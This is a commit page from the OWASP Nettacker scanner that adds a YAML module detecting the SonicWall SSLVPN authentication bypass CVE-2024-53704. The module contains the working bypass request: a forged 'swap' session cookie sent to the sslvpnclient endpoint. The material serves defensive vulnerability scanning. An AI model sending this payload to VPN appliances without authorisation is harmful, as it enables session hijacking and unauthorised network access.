adding SonicWALL SSLVPN CVE-2024-53704 module (#1018)

* Update paloalto_panos_cve_2025_0108.yaml added cisa_kev Adding cisa_kev profile to the module: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has just added this CVE-2025-0108 impacting Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. * adding sonicwall_sslvpn_cve_2024_53704_vuln module
OWASP · Feb 20, 2025 · 626a765 · 626a765
1 parent 2456cd1
commit 626a765
Show file tree

Hide file tree

Showing 2 changed files with 59 additions and 0 deletions.
diff --git a/docs/Modules.md b/docs/Modules.md
@@ -153,6 +153,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
 * '**ProFTPd_memory_leak_vuln**' - check ProFTPd for CVE-2001-0136
 * '**ProFTPd_restriction_bypass_vuln**' - check ProFTPd for CVE-2009-3639
 * '**server_version_vuln**' - check if the web server is leaking server banner in 'Server' response header
+* '**sonicwall_sslvpn_cve_2024_53704_vuln**' - check the target for SonicWALL SSLVPN CVE-2024-53704 vulnerability
 * '**ssl_signed_certificate_vuln**' - check for self-signed & other signing issues(weak signing algorithm) in SSL certificate
 * '**ssl_expired_certificate_vuln**' - check if SSL certificate has expired or is close to expiring
 * '**ssl_version_vuln**' - check if the server's SSL configuration supports old and insecure SSL versions

diff --git a/nettacker/modules/vuln/sonicwall_sslvpn_cve_2024_53704.yaml b/nettacker/modules/vuln/sonicwall_sslvpn_cve_2024_53704.yaml
@@ -0,0 +1,58 @@
+info:
+  name: sonicwall_sslvpn_cve_2024_53704_vuln
+  author: OWASP Nettacker team 
+  severity: 8.2
+  description: CVE-2024-53704 Is an Improper Authentication vulnerability in the SonicWALL SSLVPN authentication mechanism which allows a remote attacker to bypass authentication.
+  reference: 
+    - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0003
+    - https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking
+    - https://www.cisa.gov/news-events/alerts/2025/02/18/cisa-adds-two-known-exploited-vulnerabilities-catalog
+  profiles:
+    - vuln
+    - vulnerability
+    - http
+    - high_severity
+    - cve
+    - sonicwall
+    - cisa_kev
+
+
+payloads:
+  - library: http
+    steps:
+      - method: get
+        timeout: 3
+        headers:
+          Host: "{target}"
+          User-Agent: "{user_agent}"
+          Cookie: 'swap=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA='
+        allow_redirects: false
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              paths:  
+                - "cgi-bin/sslvpnclient?launchplatform="
+              schema:
+                - "https"
+              ports:
+                - 443
+                - 4433
+                - 4443
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200"
+              reverse: false
+            header:
+              Server:
+                regex: 'SonicWALL SSLVPN Web Server'
+                reverse: false
+            content:
+              regex: 'NELaunchX1'
+              reverse: false